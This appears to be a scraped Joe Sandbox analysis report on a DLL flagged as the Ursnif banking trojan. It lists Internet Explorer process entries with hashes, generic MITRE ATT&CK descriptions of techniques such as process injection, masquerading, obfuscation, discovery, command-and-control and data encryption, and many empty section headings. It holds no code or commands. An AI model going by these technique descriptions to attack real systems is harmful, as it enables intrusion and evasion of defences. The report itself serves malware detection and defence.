Imagebase:	0x7ff659610000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 5532 Parent PID: 5608

General

Start time:	13:47:42
Start date:	28/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2
Imagebase:	0xad0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 3064 Parent PID: 5608

General

Start time:	13:47:57
Start date:	28/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2
Imagebase:	0xad0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report mental.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers